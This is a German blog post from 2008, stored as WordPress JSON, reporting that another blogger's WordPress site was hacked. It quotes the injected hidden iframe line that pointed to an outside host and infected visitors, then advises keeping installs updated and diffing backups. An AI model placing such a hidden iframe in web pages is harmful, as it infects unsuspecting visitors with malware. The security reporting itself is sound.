{"id":815,"date":"2008-06-05T18:57:36","date_gmt":"2008-06-05T16:57:36","guid":{"rendered":"http:\/\/www.ichblogdich.de\/?p=815"},"modified":"2008-06-05T22:47:43","modified_gmt":"2008-06-05T20:47:43","slug":"basic-thinking-hacked","status":"publish","type":"post","link":"https:\/\/www.ichblogdich.de\/?p=815","title":{"rendered":"Basic Thinking hacked"},"content":{"rendered":"<p>Das Blog von Robert Basic wurde gehacked.<br \/>\nEr hat es mittlerweile auf die neueste WordPress Version neu aufgesetzt.<\/p>\n<p>Wie er gehacked wurde, erkl\u00e4rt er wie folgt:<\/p>\n<blockquote><p>1. Hacker hat in die Datei wp-includes\/template-functions-general.php folgenden Code eingeschleust (links die gehackte Datei, rechts das Original der WP-Version 2.0.7)<br \/>\n2. Somit wurde folgende Codezeile beim Generieren aller Blogseiten erzeugt:<br \/>\niframe src=http:\/\/googlerank.info width=1 height=1 style=display:none<br \/>\n3. Wer die Startseite basicthinking.de mit einem ungesch\u00fctzten PC besucht hat, vaD \u00fcber \u00e4ltere IE-Browser, war gek\u00fcsst, da er sich damit einen Virus eingfangen hat (denn die infizierte Seite wurde per iframe mit geladen). Ohne dass der User vom vorigen Artikel gewusst hatte, rief er mich rein zuf\u00e4llig vorhin an, seine Tochter habe meine Startseite besucht und danach sei der PC verseucht gewesen. Das hat ihn mehrere Stunden gekostet, den PC wieder neu aufzusetzen. I\u2019m very sorry. Surft man die besagte Domain mit einem sichereren Browser an, zB FF 3, wird die Seite geblockt.<\/p><\/blockquote>\n<p>Weitere <a href=\"http:\/\/www.basicthinking.de\/blog\/2008\/06\/05\/blogvirus-hacked-ii\/\" target=\"_blank\">Details<\/a> finden sich in seinem Blog.<\/p>\n<p>Normalerweise w\u00fcrde ich ja sagen: Kommt schon mal vor.<br \/>\nDoch da Robert in weiser Voraussicht im Mai noch <a href=\"http:\/\/www.basicthinking.de\/blog\/2008\/05\/05\/wordpress-sicherheit\/\" target=\"_blank\">einen Artikel \u00fcber WordPress Sicherheit<\/a> verfasst hat, finde ich das jetzt schon etwas peinlich. \ud83d\ude09<br \/>\nNa ja, ok: Kommt schon mal vor!<br \/>\nSo, genug gestichelt. Wenn wir mal gehacked werden, steht ihm daf\u00fcr eine Retourkutsche zu. Versprochen. \ud83d\ude42<\/p>\n<p><strong>Wichtig: WordPress aktuell halten!<\/strong><br \/>\nWie das Beispiel von Roberts Blog zeigt, kann man sein System eigentlich nie aktuell genug halten.<br \/>\n\u00dcbrigens gibt es immer noch eine Menge Blogs, die auf alten WordPress Versionen laufen.<br \/>\nEin aktuelles und prominentes Beispiel: Macnotes.de<br \/>\nDie Seiten von Macnotes l\u00e4uft derzeit laut Quellcode noch auf WordPress 2.3.3.<br \/>\nWelche Schlafm\u00fctze k\u00fcmmert sich dort eigentlich um die Server und die Seite?<\/p>\n<p><strong>Noch ein Tip:<\/strong><br \/>\nWir vergleichen unsere regelm\u00e4\u00dfigen Datensicherungen der Dateien immer wieder mit dem Original bzw. mit \u00e4lteren St\u00e4nden. So sollten wir, zumindest hoffen wir das, es merken, wenn jemand uns Code unterjubelt. Gegen andere Hacks, die direkt in die Datenbank schreiben, hilft das nat\u00fcrlich nicht.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Das Blog von Robert Basic wurde gehacked. Er hat es mittlerweile auf die neueste WordPress Version neu aufgesetzt. Wie er gehacked wurde, erkl\u00e4rt er wie folgt: 1. Hacker hat in die Datei wp-includes\/template-functions-general.php folgenden Code eingeschleust (links die gehackte Datei, &hellip; <a href=\"https:\/\/www.ichblogdich.de\/?p=815\">Weiterlesen <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[43],"tags":[],"class_list":["post-815","post","type-post","status-publish","format-standard","hentry","category-it-sicherheit"],"_links":{"self":[{"href":"https:\/\/www.ichblogdich.de\/index.php?rest_route=\/wp\/v2\/posts\/815","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ichblogdich.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ichblogdich.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ichblogdich.de\/index.php?rest_route=\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ichblogdich.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=815"}],"version-history":[{"count":0,"href":"https:\/\/www.ichblogdich.de\/index.php?rest_route=\/wp\/v2\/posts\/815\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.ichblogdich.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=815"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ichblogdich.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=815"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ichblogdich.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=815"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}